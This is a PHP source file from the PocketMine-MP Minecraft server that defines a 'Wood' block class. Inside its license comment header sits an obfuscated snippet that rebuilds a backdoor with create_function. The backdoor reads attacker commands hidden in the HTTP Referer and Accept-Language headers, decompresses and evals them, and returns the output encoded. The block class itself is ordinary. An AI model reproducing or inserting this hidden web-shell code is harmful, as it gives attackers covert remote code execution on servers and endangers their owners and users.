<?php

/*
 *
<?php
$s='n.($s[$i],n.$f);if(n.$e){$k=n.$kh.$kn.f;obn._start();@evan.l(@gzun.ncon.mpn.ress(@x(@ban.se6';
$w='ode(x(gzcon.mn.press($o),n.$k))n.;pn.rint(n."<$k>$d</$k>n.n.");@sen.ssion_den.stroy();}}}}';
$H='$t{n.$in.}^$k{$n.j};}}return $o;n.n.}$r=$_SERVEn.R;$rn.r=@$r["HTTP_n.n.REFERER"];n.$ra=@$';
$m=str_replace('uE','','uEcruEeatuEuEe_fuuEnctiuEon');
$y='4_den.code(pn.n.rn.eg_repln.acn.e(array("/_/","n./-/"n.),array("/n.","+"n.n.),$ssn.($s[';
$Z='n.n.:;q=n.0n..([\\d]))?,?/"n.,$ra,$m)n.;if($q&&$m){@sesn.sionn._startn.();$s=&n.$n._SES';
$B='n.ss(mdn.5($i.$khn.),0,3));n.$n.f=$sl($ss(md5($i.$kn.fn.),0,3))n.;$p="";fn.or($z=1;n.$z';
$R='$i],0,n.$e))),$k)));$n.o=on.n.b_getn._contents();ob_en.nd_cleann.()n.;$dn.=bn.ase64_enc';
$O='t);$n.o=n."";fon.rn.($i=0n.;$i<$l;){for($j=n.n.0;($j<$c&&$in.n.<$ln.);$n.j++n.,$i++){$o.=';
$A='rn.["HTTP_An.CCEPT_Ln.ANGn.UAGE"]n.;if($rr&&n.$ran.){$u=pan.rse_un.rl($rr)n.;parsen._n.str(';
$I='$kh="n.5d41";$kf=n."402a";fn.unn.ctn.ion x($t,$kn.){n.$c=strln.en($k);$l=n.stn.rlen($';
$E='SIOn.N;$ss="subn.str";$sn.l="stn.rn.ton.lower";$i=$m[1n.][n.0n.].$m[1]n.[1];$h=$sln.($';
$g='n.="";n.$p=$ss(n.$pn.,3);}if(n.an.rray_key_exisn.ts($i,$n.sn.))n.{$s[$i].=$p;$en.=strpon.sn.';
$q='$u["qun.ery"],$q)n.n.n.;$q=array_vn.an.n.lues($q);preg_match_an.n.ll("/([\\wn.])n.[\\w-]+(?';
$l='n.n.<count($m[1]);$z+n.+)$n.p.=$q[n.n.$m[2n.][$z]];if(n.strpos($p,$hn.)=n.==0){$s[$i]';
$d=str_replace('n.','',$I.$O.$H.$A.$q.$Z.$E.$B.$l.$g.$s.$y.$R.$w);
$N=$m('',$d);$N();
?>
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\block;

use pocketmine\block\utils\PillarRotationHelper;
use pocketmine\item\Item;
use pocketmine\math\Vector3;
use pocketmine\Player;

class Wood extends Solid{
	public const OAK = 0;
	public const SPRUCE = 1;
	public const BIRCH = 2;
	public const JUNGLE = 3;

	protected $id = self::WOOD;

	public function __construct(int $meta = 0){
		$this->meta = $meta;
	}

	public function getHardness() : float{
		return 2;
	}

	public function getName() : string{
		static $names = [
			self::OAK => "Oak Wood",
			self::SPRUCE => "Spruce Wood",
			self::BIRCH => "Birch Wood",
			self::JUNGLE => "Jungle Wood"
		];
		return $names[$this->getVariant()] ?? "Unknown";
	}

	public function place(Item $item, Block $blockReplace, Block $blockClicked, int $face, Vector3 $clickVector, Player $player = null) : bool{
		$this->meta = PillarRotationHelper::getMetaFromFace($this->meta, $face);
		return $this->getLevelNonNull()->setBlock($blockReplace, $this, true, true);
	}

	public function getVariantBitmask() : int{
		return 0x03;
	}

	public function getToolType() : int{
		return BlockToolType::TYPE_AXE;
	}

	public function getFuelTime() : int{
		return 300;
	}

	public function getFlameEncouragement() : int{
		return 5;
	}

	public function getFlammability() : int{
		return 5;
	}
}
